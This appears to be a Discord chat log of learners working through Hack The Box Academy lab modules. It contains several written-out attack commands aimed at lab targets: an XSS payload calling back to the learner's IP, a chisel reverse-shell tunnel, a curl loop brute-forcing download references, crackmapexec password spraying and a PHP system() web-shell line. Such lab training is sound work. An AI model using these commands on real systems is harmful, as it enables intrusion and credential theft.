#modules

just use a different port to catch the system shell

well took me 3 hours but i got it wow

i think it is ok even if it takes 2 days, there is no rush in trying to understand and try things

That's was an long and exhausting journey, but I managed to finish it

Second assessment was really tough imo

hi,

i use powershell but didnt accept

congrats! you made it! and yes it tough but a pleasant one

brother you blocked out the second output for the rights/ACE

literally the first answer is right there

read the question :)

no im try first answer and secondly answer format word-word

yes

as in the answer is a-b

o understnd

and it's formatted that way in your screenshot

deleted

as word-word

thank you

that module took me forever

after that is the long desert of web stuff... rummaging with single quotes and one equals eventually to one hu...

Guys!

I am practing the Zephyr (PRO LAB). I've got the entry point 10.10.110.0/24. When I scan the network, it gives me 2 host alive and when I scan those host, I find nothing useful.

Please help

#prolabs-zephyr

anyone please?

Not in this channel

Fine, Suggest the correct one

Read and follow #welcome to access #prolabs-zephyr

Thankyou. I was not loggen in with my account. I couldn't see it. NVM

Bypassing Encoded References im stuck, im read through everyones post on here about it and still cant figure it out. This is my bashscript, can someone help me please. #!/bin/bash

for i in {1..20}; do
for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "contract=$hash" (target ip)/download.php
done
done

maybe you missed targetip:port?

but there you just changed a number fron the course example, you should try to find how the contracts names are formatted and how to get them, it may be another method.

Hey guys, i'm currently doing the Whitebox Attacks Skills Assements. I've elevated my priv to a user. I'm pretty sure what the next step is but my attack might need some tweaks. Thanks in advance!

Module: INTRODUCTION TO WINDOWS EVASION TECHNIQUES
Section: Process Injection
Hello everyone,
There seems to be a problem with the lab, there is no .exe file being run from C:\Alpha\ProcessInjection. The log.txt doesn't get updated since 7 of may. Is it possible for someone to have a look?

module: cross-site scripting
section: session hijacking
i've loaded my remote scripts and tried every parameter except for password and email and started a nc listening but i dont receive any responses back. Im not sure why

have u tried different type of xss payloads

i think for this section im supposed to use this payload
<script src=http://10.10.14.185:8080/username></script>
where i replace "username" with fullname, or "url" so when it gets sent back to my nc listening i know which paramater is vulnerable?

my ip 10.10.14.185:8080 is the tun0 interface

they also provided with other xss payloads for you to try if one didnt work

ooohh

i changed my vpn and thought the connection was bad now i feel stupid 😭

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

hi

trying to connect to a target using xfreerdp and a password for the lab in passing the ticket. I am getting what looks like a logon failure due to certificate not maching name of machine

i've tried /cert:ignore and also in case it was due to having previously had a machine with same cert but different ip for a previous lab i also deleted ~/.config/freerdp/knowhosts2 entries

That wouldn't be the error

The error is more likely bad creds

xfreerdp /v:10.129.204.23 /u:Administrator /p:AnotherC0mpl3xP4$$

WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0 just a warning

then later
SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server

wrap the password in single quotes

This is the actual logon error

The first is just a Warning

got it thx

saved me a lot of time

the logon failure didn't seem to tell me much

it was the SPNEG0 that had me confused

It means your creds are bad

That's just negotiation

ok. i thought it was referencing cyrpto negotiation

i got confused.

again

Just wrap the password in single quotes

done and i'm in

just need to do the challenges now 🙂

If it's a pass with $$ in it that's the call to the current shell PID

true

totally forgot about shell escaping

Single quotes tells bash to interpret it as just a string

i really should have remembered that

time to dump some tickets : )

SPNEGO is just the authentication protocol btw

Yes, it's a connection issue of you getting dropped

Try adding: /timeout:9999

Hello there are french guys?

https://tenor.com/view/chris-pratt-interview-jimmy-kimmel-2021-gif-9091736678629998308

Very likely in France there are

Hi, is this the correct way to add a host to RDP? I added it in the part I marked with the blue rectangle and the red rectangle

you don't need to add to your hosts file to rdp

I have the problem to RDP to the user to get the flag for the last question of the module AD, section
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
I go the user and password but i am unable to access with xfreerdp

are you able to ping the ip?

and also just in case add the single quotes around the password

Yeah i can ping the IP. Already added quotes around the password, the result is the same 😦

Try rdesktop from the attack box or you could maybe dynamic port forward over ssh and try to RDP from your vm?

I had this error today on the AD module also but on an earlier section but I cant remember how I fixed it, wasn't anything special/fancy.

It is taking its time lol

Oh boy 😦 Unable to connect too with rdesktop

Suddenly worked lol

can i ask something guys,do other ppl have big problem with VPN or its just me?

https://academy.hackthebox.com/module/110/section/1053

currently on this module, and whenever i run the proxychains command on a website it gives me an error

User issue. He deleted a line he wasn’t supposed to

yea im an idiot

PEBCAK

wait no it still doesnt workj

I dont speak very good🤣

Lmao

Hi all, sorry if this is a stupid question but, module DACL ATTACKS I, targeted kerberoasting, question 2 asks to use Bloodhound. I'm probably missing something but I can't find the data from an ingestor to upload and use, I just have a blank BH. I've looked into the various folders but nothing. What am I missing?

did you run sharphound or bloodhound.py?

Oh right i somehow thought they were already provided, I did say it was likely a stupid question. Thanks mate!

Module:-INFORMATION GATHERING - WEB EDITION & Section:-DNS zone transfers can someone help after using dig ns with target what i need to do next not able to ping the target

Did you add inlanefreight.htb to your /etc/hosts file?

should i share url?

what do you mean?

its ok i am trying means that command with url which i used

https://academy.hackthebox.com/module/77/section/844

The second question, I can't get it.

I used chmod 600, I copied the private SSH key from id_rsa from target machine to my local machine

I don't know why it's doing that, i'd appreciate if someone could help with this

well, yeah you can post the command you typed. Or anything that could be relevant to help someone help you troubleshooting your issue.

Seems it's just not the second question, but I tried re-connecting back to the machine and now that doesnt work either

I'll try to reset my target.

Seemed like to be a target issue, as I reset the target it got fixed.

no clue why my postgres exploit script isnt working for the skills assessment of the Advanced Sql Injection module. the first query runs, but then none of the other queries run. I set a select pg_sleep(10) after each query to see if it errored out, and only the first query is running. It seems its not able to INSERT

the script ran well for bluebird but its not working for the skills assessment

Is there anyway to reset an answer? With the new information gathering update, it only has me doing the new questions, but the old answers still remain

No

sweet I think I found a work around! It was probably intended im just dumb and took a while to figure it out

learned alot reading the docs 🙂

Can I have a hint, I'm working on the Advanced XSS and CSRF exploitation module, specifically section "Launching Attacks from the Victim's Session".
I've tried using the reset function with no luck, I suspect that's not the right way as the reset function appears to be disabled.
I also tried exfiltrating the home page (home.php) using the XSS vulnerability but I get nothing on my exfiltration server.
In my payloads I have tried variations with try/catch statements to catch errors but still no luck.

got it 😄 wow this was an awesome module

Take a close look at the page. What exactly do you need to send messages?
Even an admin will need this 😉

Hi, I've just tested the tier 0 modules and found that some of them lack a coherent structure in the sections and some sentences really don't make sense. So I ran the text content of these modules through an AI-generated text detector (https://www.zerogpt.com/fr/) and it appears that they've been totally generated. It's mostly about a certain author, does hackthebox know about this? If so, it's a bit disappointing...

Why it is wrong rephrasing your text using GPT?
And also why do you trust that zerogpt thing? I guess it just checks some rules and flags it as "generated from GPT" and nothing more.

It's not just rephrasing. When I read it, I immediately understood that the text had been generated because of its strange structure, as I see a lot of AI-generated text in my line of work. To confirm this feeling, I simply used this tool as I've been able to confirm in the past that it manages to correctly detect and locate portions of generated text (you can try it with chagpt text, it's pretty accurate). The content of these modules is also detected by other systems (for example https://undetectable.ai/ which summarises the results of other detectors). Some parts of these modules may have been conceived by a human, but I strongly recommend that you check them out.

Comrades, good day, I want to ask you this specific question: If I want to practice a lot about the password attack module or another specific topic, does the academy offer this possibility to focus on a topic, whether it is any topic? I appreciate your contribution.

You can practise in a module for as long as you like

I understand but I want to know as such where I can perform it on the machines or is there a specific topic that says passwords attacks or another topic

The Academy itself only provides the modules.
At the end of the modules, machines are often suggested by the main platform that deal with the topic from the module

Hello everyone, which module would you recommend me in order to do Zephyr ? I did the module Ad enumeration & attacks but i have 500 cubes left, i was thinking of the Kerberos module ?

Has anyone else faced this issue or is it just me? When I try to do RDP using Reminna, I get a black blank screen. But when I RDP into the same machine right after, using xfreerdp, I get the GUI.

yes, you could try to press the enter/return key onyour keyboard, sometimes it needs a little push

Thanks I will try that

does the ouptut look right when i use the command:
.\EvtxECmd.exe -f "C:\Users\johndoe\Desktop\forensic_data\kape_output\D\Windows\System32\winevt\logs\Microsoft-Windows-Sysmon%4Operational.evtx" --csv "C:\Users\johndoe\Desktop\forensic_data\event_logs\csv_timeline" --csvf kape_event_log.csv

Module : Footprinting
Section : IMAP / POP3
Question : "Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer. "

I don't understand why my answer is not valid, it's written LITTERALLY...
Any hint would be appreciated 🤔

Did you add Ltd

Oh god I feel so dumb
Thanks sir 🙂

No worries 🙂

hey, mind if I pm you now?

INTRODUCTION TO DIGITAL FORENSICS
Rapid Triage Examination & Analysis Tools
Review the file at "C:\Users\johndoe\Desktop\forensic_data\kape_output\D\Windows\System32\winevt\logs\Microsoft-Windows-Sysmon%4Operational.evtx" using Timeline Explorer. It documents the creation of two scheduled tasks. Enter the name of the scheduled task that begins with "M" and concludes with "r" as your answer.

kind a stuck here. i searched in the file for tasks, i filtered Event Record Id for 1, filtered for process creation but haven't found the right answer.
any hint? it feels like it shoulnd't be so difficult...

Sure, go ahead.
I'm on my way to work right now, but I'll write you back as soon as I can.

Sup guys

Y’all have aimbots by chance?

i've not done that module so can't really guide you, but when you say you searched for "task". You mean the word? Did you search for a specific event ID related to scheduled task creation?

i searched for creation, the word task and event id 1 (which should be related to creat a task)

ok, but event ID 1 is process creation... when I google event id scheduled task creation, i see different IDs

i found also 4698 , but either no luck with this one

it feels like it shoulnt be so difficult...

@timber hatch I haven't done the CDSA but, have you filtered in timeline explorer under "Operation"

Hopefully there's an option to filter that by "Scheduled Task", I dont have the evtx file or TImeline explorer to try it im going off memory

it is probably not, when you have the answer it will seems trivial

you mean a column header with operation? this does not exist

Interesting

What columns do you have available from the evtx log?

I can't re-create your envinronment so some screengrabs or more detail will help, unless someone who has done it jumps in

uff, a lot.

👀

Are you able to find schtasks.exe in any process listing or the PID for schtasks.exe?

@timber hatch

yes, but also with that i do not find the answer

is there any possibility to search for the name? it begins with "M" and concludes with "r". Something like a wildcard or something ? M*r or some regex? Or filter out stuff you know for sure it will not be, to reduce you search surface?

hey guys can anyone help me with this question??i have been trying for days, thank u in advance

INFORMATION GATHERING - WEB EDITION
Creepy Crawlies
After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.

without giving too much, if you attempt all the techniques shown on the page it will be pretty easy to spot

also may not be super obvious, output needs to be analyzed attently, espcially anything that may refer to comments

is this for me?

no, its about the web

as more obvious hint, have you considered using one of the crawlers/spiders they present ?

i did crawl

tried that also yes

i did python3 ReconSpider.py http://inlanefreight.com

i finished the whole module i only have the one i told u

which where it saves

DM!

Ahoyhoy, still doing the linux fundamentals, but I am becoming sooooo frustrated with linux. Its always "it should work like this" ...." but not in this case". Now I try to put my curl output to a file. curl https... > file.txt , file is always just empty

thanks

Assuming you are not querying something with no results(dont know if possible), if you take a look at the curl help, is there any other flag you could try to signal an output file?

so i used the -o but still nothing 😦

what are you trying to curl?

ohhh I am so dumb the www. got lost in the process >.> thank you ❤️

Hello, trying to complete the Web Request module in HTB Academy. I'm on the HTTP methods - POST at the moment trying to get the flag.

I was able to login with the session ID w/ curl, search the flag via curl, but when I enter it, it keeps saying incorrect.. not too sure if I found the wrong flag...?

I don't know about the process or the wrond flag, but did you check for a starting or trailing space?

Thank you , this worked although I had to remove a word out of the flag

did my message get removed because I didn't obfuscate the answers?

right ok

i don't know, i guess if a mod removed your message they would have said something

oh but it disappeared but no one has said anything?

i dont know what happened, i saw your first message but not a module i did, got busy on another screen, came back to see your other message

ahh fair enough just trying to understand the fundamentals of Event Viewer but it appears not many actually do too much with it, I guess I will just have to follow my hunch

yeah... it seems there are less people doing blue team modules, so i guess getting answers could be a bit more uncertain

Comrades good day I'm stuck with a question modules: section Attacks on passwords Attacking Active Directory & NTDS.dit the question is the following In a compromise, you have gone to several social media sites and found the names of Inlanefreight employees: John Marston, IT director, Carol Johnson, financial controller, and Jennifer Stapleton, logistics manager. You decide to use these names to carry out password attacks against the destination domain controller. Please submit John Marston's credentials as a response. (Format: username:password, case sensitive) But I see that when I run the tool I get a build error something like this: SMB 10.129.202.85 445 ILF-DC01 [*] Windows 10.0 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local) (signing:True) (SMBv1:False)
Trace (last most recent call):
File "/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240208.120203.63438ae7-py3.11.egg/impacket/smbconnection.py", line 278, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240208.120203.63438ae7-py3.11.egg/impacket/smb3.py", line 1040, at login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The command I run is the following crackmapexec smb 10.129.202.85 -u johnmarston -p /usr/share/wordlists/fasttrack.txt

help

format your message with code blocks pls, hard to see the actual output

you can use netexec instead of crackmapexec

Yeah would appear so, going out on a whim I don't suppose you know of any good courses that might cover it?

tx, i'll have a look

Good morning, I would like to ask XXE Advanced File Disclosure why I used the expected payload, but it did not work as expected

guys, it seems that "Information Gathering - Web Edition" is broken after update. Someone was able to get last skill assessment flag?

Question are different, but immutable submitted answers. inlanefreight.htb seems broken. Someone is experiencing same issue?

Thank you I found the problem, I didn't close the content

hello, i got a connectivity problem.

I dont know where to ask

I am doing WINDOWS PRIVILEGE ESCALATION / Windows Server

But i cannot RDP to the server, remmina says unable to connect. I switched to EU 1,4,5 but nothing works.

The answer to one of the modules is wrong

module/77/section/847

netcat returns SSH-2.0-OpenSSH_9.2p1 Debian-2, and it says it's wrong, and when i reveal answer i get that the correct answer is ubuntu

Hey in modules of password attacks, There seems to be a problem with installing crackmapexec on the attack box...

tried installing python3-neo4j from another source and have encountered some problems... :/

ah, yes, but i used port 22 instead of 43364

thanks

you should use the port provided to you

I used chat gpt to debug, now its working

Based on the detailed debug output, it appears that the issue is specifically related to the negotiation of the NLA security layer. The error ERRCONNECT_TLS_CONNECT_FAILED suggests that the TLS handshake is failing. Let's try some additional approaches:

got it. in the example they used 22, so that's why, i thought it's the default port for ssh

Any fix?

use netexec instead

ok thanks

use /tls-seclevel:0

i got it working

so basically netexec is crackmapexec but more up to date??<

yep, it's the fork that's being maintained

that' sweet, didnt know that

hi all

AD enum attack modul
ACL Seciton
DcSync Page

i use the secretsdump and output cleartext file but this file in empty

I found my user but the cleartext file is empty and I can't see the user's password

can someone help i even tried fuzzing on this target but still didn't get single 200 how to solve this ..... Module:-ATTACKING WEB APPLICATIONS WITH FFUF & Section:-Sub-domain Fuzzing

fuzzing output

Try using another wordlist?

ok

isn't the answer right there

got it

i think i made blunder by using fuzzing just want to use logic xd but got it

unfortunately i'm not much help since I haven't yet really investigate the defensive side. However searching in my bookmarks I see this Sans Forensics & incident response youtube channel, there might be some good content in there: https://www.youtube.com/@SANSForensics/search?query=event viewer

Modern Web Exploitation Techniques

am supposed to run the application locaaly ad exploit to get flags ?

or they just gave source code for better understanding

guys, anyone had problem for Attacking DNS? and this question? Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

I have not been able to make any progress and I don't know what I am doing wrong.

which section

SSRF Basic Filter Bypasses

there is target ip but zip file too so i was confused what exactly I have to do

the source is given so that you know how to attack it

some of the things are not really possible to know without the source code

Yeah i was thinking that so i asked

thanks buddy have a good one

you can target specific users with secretsdump.py

I am doing shells and payloads - the live engagement
The rdp screen is very small and doesnt change resolution.
xfreerdp /v:IP /d:HTB /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution

set a fixed resolution e.g./size:1200x800

I am trying to do a reverse port forward with chisel, to get a reverse shell, back but it's failing

On kali:

kali@kali:~$ chisel server --reverse -p 10001 &
[1] 16168

2024/07/01 11:44:11 server: Reverse tunnelling enabled
2024/07/01 11:44:11 server: Fingerprint lhknR+IHrzzNUTj9GsM9OsLMCkyoujeVStv8/RPzcw4=
2024/07/01 11:44:11 server: Listening on http://0.0.0.0:10001

nc -lvnp 12345

on pivot box

webadmin@inlanefreight:~$ ./chisel client 10.10.15.16:10001 R:55555:127.0.0.1:12345 &
2024/07/01 12:04:27 client: Connected (Latency 41.294889ms)

on target on the remote network, big powershell command fails like this

New-Object : Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine
actively refused it 172.16.5.15:55555"

Anyone got an idea ? In my mind I am telling the pivot box to listen for any connection attempt on 55555 and forward it to 12345 on kali. On powershell I attempt the reverse shell towards the pivot's box internal network IP 172.16.5.15, port 55555

(powershell command is just powershell 1 from reverseshell generator site)

worked, thanks.

I wouldn't use such a high number port, anything above ~49k are dynamic ports

Hey I'm new here Can anyone suggest free resources for ethical hacking?

same outcome with 33333

I can get triple pivot, bind shell on anything but for the love of almighty I cannot get a reverse shell and been trying whole day

shouldn't the revshell connect to port 12345 instead

Hey guys
what to do if I have a chain going on, for example: web site show a lot of directories— Directory Listing Enabled, went to some directory and uploaded a file there, which was not supposed to be— Unrestricted File Upload. How should I make it out in the report?

also the listener is opened at 127.0.0.1 but your powershell is connecting to 172.16.5.15

am I missunderstanding how chisel reverse port forwarding works ? in my mind this tells the client to listen on 55555 and forward everything to the server at 12345
R:55555:127.0.0.1:12345

or is that wrong ?

toplogy for reference. Ubuntu is the pivot box. The idea is get the a reverse shell from server 1 to Kali

it's the other way around

R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>

which does reverse port forwarding, sharing <remote-host>:<remote-port>
from the client to the server's <local-interface>:<local-port>.

well I apreciate all the help, but that still did not do it

i think the syntax is for ssh reverse port forwarding too, not chisel

this is taken from the chisel repo

well the github only has the man page of the tool itself as explanations...

idk, for some reason this only works with metasploit, anything manual and it does not work....

yes and it's taken from that

there's also this
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

yeah I read that one, pretty good info for regular pivoting

reverse port forwarding not so much

huh? reverse port forwarding is mentioned

yes, but not for the scenario I am interested in, catching reverse shells. And the CPTS course only show you how to do it with metasploit lol

Thank you, apologies for the delay I wewnt to the gym to try get my mind going lol... that actually looks a really useful channel I know Sans are well regarded

I mean... the concept is the same

You have the reverse point to your listening port

yes, but without a practical example, I am lost

like I could not find anywhere, "ok we established a pivot point with host A, now lets setup a chisel reverse forward to catch a reverse shell from host C"; no content for this

Practice on the double pivot host from the pivoting and port forwarding module

Or the skill assessment

It's what I did to get used to ligolo

it's what I did, double pivot on asseessment and is fine. I have setup a small lab with mixed linux windows and practiced triple pivot on it too. I can get a bind shell with all of the machines.

I am pretty sure there's some really good stuff on youtube for chisel examples I want to say john hammond done some stuff, I reviewed that when I was doing some CTF boxes that needed it

thanks a lot, that finally did it for me

@late moth at the first question it says "based on the last result, find out wich operating system it belongs to" but it doesn't gave me an IP address to scan, and the last result don't say anything about operating system

Because it's based on the last example

Hint: TTL is interesting

I can't see anything about operating system in the examples, it only shows echo requests, echo reply, host up, mac address

Yes. TTL is one way to find out an operating system, utilize Google

There's a good handful of Defaults for different base kernels

Hi guys I need some help I just signed up I'm out of date and I need help with memory addresses I used to bof rop and I'm from the 80's please help

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

If it's not related to an academy module, read and follow #welcome to access more channels

dang, you got the answer out quick. I can tell you've looked at that module a couple times lol

It's something I remember looking up

"How to get os info from a ping"

A lot of my stuff is from doing the extra legwork to understand it

ooohh I didn't know that, I just answered now thanks ♡

seems like its paid off.

And spending time here reinforces, if I'm unsure I'll just spin up the lab to be sure I'm not misremembering or my notes are incorrect

After reading the PetitPotam section in the AD Module my brain is about to explode

it's just ntlm relay 😄

OK, I feel really stupid asking this but I can't find any documentation on this anywhere... How do I encode input with ffuf? I see the '-enc' in the help page, but I don't see any explanation on how to actually use it...

Any advice?

in the image: In place of finding a wordlist with numbers from 0 to 2000, this will send the command output as a wordlist.
... i saved that from a ippsec video, it seems ffuf accepts some bash (?) as wordlist. Or a solution could be encoding payload before sending it to ffuf via a variable as wordlist? Or encode the ffuf output with piping into something.

@wraith pelican 🤔 probaby just going to have to pre-encode the word list. I was hoping not to have to mess with it because my shell scripting isn't that strong, but I suppose now is as good a time to brush up on it as any... 🤷

found that
https://github.com/ffuf/pencode

@qui3t Yeah, I found that too, I haven't looked into it, yet. However, it's also on my list of things to at least check out.

@wraith pelican yeah, that sounds like what I'm looking for.

@hexed oyster i just checked the ffuf help,
-enc Encoders for keywords, eg. 'FUZZ:urlencode b64encode' it seems you just need to add which encoding you want after the FUZZ in your command
That or after the FUZZ we can add after the wordlist

@wraith pelican I've tried that and it seems like it breaks. let me try again and verify

this is the command that I know is working now

ttack/os-cmd-execution/inject-whoami.txt":CMD -u "http://94.237.59.63:40239/index.php?to=tmp&from=238002
9473.txtDELIMCMD&finish=1&move=1" -replay-proxy "http://127.0.0.1:8080" -fr "\s*Malicious\s+request\s+de
nied" -H "Cookie: filemanager=gs5v3te0o8hjf3jsu8glvtdj3g"  -c -ic -r```

change I'm going to make: -w "$HOME/src/fuzzdb/attack/os-cmd-execution/shell-delimiters.txt":DELIM:urlencode

above change caused an error:

see last line of the screenshot

unless I'm misunderstanding what the documentation is saying... entirely possible.

that s complex command just to check how the encoding works, so much could go wrong : D

Not incorrect. 😁

not really sure how I'd simplify it, though.

this works ffuf -w wordlist.txt:FUZZ -x http://127.0.0.1:8080 -u http://10.10.11.20:3000/#/FUZZ -enc 'FUZZ:b64encode'

@hexed oyster for yeah different FUZZ word you use, you can specify the encoding

OH!!!!

You specify it at '-enc'!

🤦‍♂️

Thank you.

I don't know why I didn't put that together...

yes flag -enc then the word in single quotes and the encoding type, but i cant find a list of possible encoding at the moment

and thank you too I learned something

https://tenor.com/view/the-more-you-know-gif-26317296

Colleagues I am stuck with the question in the password attack module, specifically the Attack Active Directory & NTDS.dit module because at the moment I am executing the command I get an error.

The question is:
In one engagement, he's gone to several social media sites and found the names of Inlanefreight's employees: John Marston, chief IT officer, Carol Johnson, financial controller, and Jennifer Stapleton, logistics manager. You decide to use these names to carry out password attacks against the destination domain controller. Please submit John Marston's credentials as a response. (Format: username:password, case sensitive)

The command I execute is the following:
Crackmapexec SMB 10.129.38.239 -u names.txt -p /usr/share/wordlists/fasttrack.txt

Did you use a tool like username-anarchy to create the namelist?

If I have created the list, the problem is when I am compiling the crackmapexec I get several errors in the execution

I have the mistake but I don't know how to handle it

I've replied to you couple hours ago to use netexec instead

^

I also used it and I have errors with Netexec is that I think it has to do with impacket

Cme is archived

Nxc shouldn't have any conflicts with impacket

how did you install it

also what's the error

sudo apt install netexec

I'm going to show the error I get with Netexec

You can't paste images here unless you follow #welcome

And large output often gets blocked by mee6/automod

It's really like 16 lines

ModuleNotFoundError: No module named 'impacket.dcerpc.v5.gkdi'

uninstall the apt version, follow this instead
https://www.netexec.wiki/getting-started/installation/installation-on-unix

use pipx

Thank you friend I'm going to check it out and I'll tell you

Hi everyone, I got a problem with this Q " What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive) ", I already found the password with the tool Lazagne that is FSad... and so on... so the thing is that the answer is not correct... but the tool show me the password of that service WinSCP, so I dont understand what is wrong or what

How am i supposed to know that?
It is from linux fundamentals module

• 1 Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

Did you format it username:password?

For your question: google, plenty of forum answers witn commands to give you the answer

I mean, is it how i have to do the course? just to google answer with explanation of the command provided?

i thought it is too easy

For this question, yes

It's the most curveball question

alright, thank you

Most of the rest of the modules require research

But a good portion is given to you

Did you try using it?

i tried

i got a text file but i opened it to find some large amount of text with no mention of "flag"

Well check the options and see what you might need to change to get the /flag.txt file

aight will try that ty ty

The file you retrieved is a common linux file

aight

@next bronze Thank you friend, you have saved me, now I can continue with the questions greetings from a distance

looks like the apt netexec doesn't handle envs properly

Worked!

If it's true, I'll be careful with the facilities from now on @next bronze

hah, I just found out that I don't know how to read... I hate myself for this. (laugh in pain)

well, doesnt works with Bob:FSad***** bruh

Make sure no extra spaces

noup everything is fine

i got it, i was using the incorrect user

got a question in SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)

Hello everyone I am stuck on the "Server-Side attacks" module. Specifically the "Nginx Reverse proxy and AJP" (3rd one down). I have commented out the server portion and pasted in what the instructions say but I am getting the following error -->
➜ ~ sudo nginx
nginx: [emerg] invalid host in upstream "http://83.136.252.57:39542/" in /etc/nginx/conf/nginx.conf:37
I have tried the IP and both ports (including 8009) from the spawned target as well as localhost, and 127.0.0.1.

I can supply a copy of my config file if anyone is willing to help out

this is what the question says but none of the timestamps on the graph i made match the description

hi I'm workign on the optional challenges on Pass the Ticket from Windows section. I have completed the other challenges using mimikatz to dump tickets and load johns ticket into the existing session. I close the cmd and powershell windows. Then I try to repeat my attacks using rubeus. However before I do so I check if I have access to \DC01\john\john.txt and it seems I have?

shouldn't I lose access to this share since I closed the cmd which i loaded john's TGT into?

the ticket is injected into the current session, it's not limited to a single cmd

if you want to inject fresh tickets, both mimi and rubeus has the function to purge tickets

I'm stuck in the metasploit course at the section modules, as no methods (I've searched a lot on the internet) work. Every time I get Exploit completed, but no session was created. Any help is much appreciated. Thanks :)

can somene help me with reverse shell

i managed to inject php script, i even checked it on the server terminal, i open netcat to listen on the port but when itry to access /access.log throguht the web page it just is empty as if they do not exist, i am accessing it to lmi vulnerability which is for sure there

provide more info on your msf settings

DM me if you still need help

Still can't run proxychains curl http://SERVER_IP:PORT

https://academy.hackthebox.com/module/110/section/1053

so I am in the file upload module. I downloaded the PSUpload.ps1 script onto the windows target machine ran the script in both powershell ISE and a regular powershell CLI. I was only able to run the invoke-fileupload command in ISE. Any ideas why?

import the file

doh, completely spaced that part. Thanks lol

usually you'd just use IEX to load the file directly into the memory instead of dowloading a local copy

Whenever i run {proxychains curl {target.ip}} It comes out with "Couldn't connect to server."
HELP 😭

is your proxychains config right

i think

ill send an ss

alr these are the two parts i changed as stated in the module

you didn't comment socks4

sometimes i think about life

and what i did to get here

TYSM 😻

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

hello there, for all that had try the Game Reversing & Modding module, what version of BepInEx work for you ?
thanks an adavance 🙂

im stuck on https://academy.hackthebox.com/module/134/section/1175

im following the material but I cannot get it bypass the logon

CPTS>Password Attacks>Attacking SAM: i was able to dump hashes to my pwnbox but i cannt get hashcat to output the clear text password. I have also tried outputting to a file to no avail

jk I fixed this - DO NOT run as sudo

Hi

Yeah sudo does funky stuff

its so weird, youd think it would be required for the potential resource cost

Nah

As long as you don't use --force the hashcat gods won't get mad at you

good to know, thanks!

Ok so i thought I fixed it but it didnt.. 😥
https://academy.hackthebox.com/module/110/section/1053
Still on this module, I have burpsuite open, and my foxieproxie on, but when i ran {proxiechains curl 94.237.59.199:52082}, it still came up with Failed to connect. Now i feel like im really doin something wrong.

http://SERVER_IP:PORT

i just tried using that format and I still got the same result
also the target just died so this is a new one

worked for me

can you even curl it without proxychains

yeah

came back no issue

How long does attacking AEN blind shld take?

on the file transfer module. I'm trying to practice uploading files using Wedav Share. I set up the server on my attackbox and when I try and copy a file over or list the directory using the "DavWWWRoot" to reference the root of the directory it says doesn't exsist.

the question is a lot simpler than it sounds. follow the instructions in the section all the way to the end. what's the date that is returning all the events that you see in the visualization?

can you show me your proxychains.conf file

if you dont mind

trying to do the nibbles - initial foothold module and for some reason i am unable to create a php file in my terminal. i tried using metasploit as a workaround but it deleted the image.php file on the server for some reason and now i have no idea what to do. Even if I reset the target ip I still don't know how to fix the "zsh: parse rror near \n" message I get when pasting the php system command into the console.

For context I'm doing this via Kali on a VM

Are you sure you didn't crack them already? It says it skipped 4 entries due to already being in the potfile.

So I’m not supposed to look at timestamps??? Cause the all diff

the question was worded in the worst way possible

If you feel that way; #1234357888114364508

hello, what is the command you used to create a file?

I just pasted this into the terminal: <?php system('id'); ?>

By doing that, you are asking your terminal execute the command, but it cannot do that. The course material ask you to save this code to a file.

oh shit that's what vim is for isn't it

: ) yeah

ill do that tomorrow, too tired rn

but you also can ask your terminal to write it to a file without opening vim. Did you do the linux basics module?

no but now i realise i should have

i did try find out how to do it online but couldn't figure it out lol

oh wait i just use the echo command 🤦

yeah

man i love when it turns out the answer to a question was one i figured out hours ago but for some reason it only works on pwnbox and not openvpn

I am hoping someone here can help me. I'm fairly new here and am not sure if this is the right place to ask for help. I am working my way through the Linux Basics module and working on the Navigation exercise. I SSH into the machine like it says, I open a BASH terminal and type cd /home. That puts me in the home directory. I then type ls -la to show all of the files but I'm not seeing a hidden file there that starts with a period. Any ideas to what I'm missing or may be doing wrong?

i doubt that would be the only reason

Working on the File Inclusion module Local File Inclusion section. No matter what path I enter into the url for /etc/passwd it just hangs. Is anyone willing to help me with a sanity check and verify the resource isn't working?

Is this the module

Yes

i found that out because multiple other people here had the same problem

it’s literally the only thing that changed

which module, section, and question is this

you are forgetting who you are. what are you seeing when you ls -la /home ?

i’m not getting into this again

ok

bear with me, im going through it now

my computer is slow and the target takes forever to spawn

I get a file listing of 3 files. cry0l1t3 htb-student mrb3n

those are directories, you can try and explore them

If I follow the module and put /var/www/html it works just fine but not /etc/passwd

AUGH IT'S MY FUCKING VM AGAIN I HAD THE SAME ISSUE WITH REVERSE SHELLS LIKE A WEEK AGO

hm

The file is not in the overall /home directory

Thank you very much. I thought those were files. lol I'm very new to all of this.

yep it works on pwnbox and my debian install but not my kali vm
exact same thing happened with a reverse shell a week ago

i've gotten impacket to stop working because of some shit installed via pip to get other scripts working (certipy), having snapshots helped

did you try the different examples given in the course material?

i need to figure out how to uninstall and reinstall my vm without losing all of the stuff i have on my kali vm

reinstalling tools is not that big of a deal

thank you

Yeah all of them multiple times

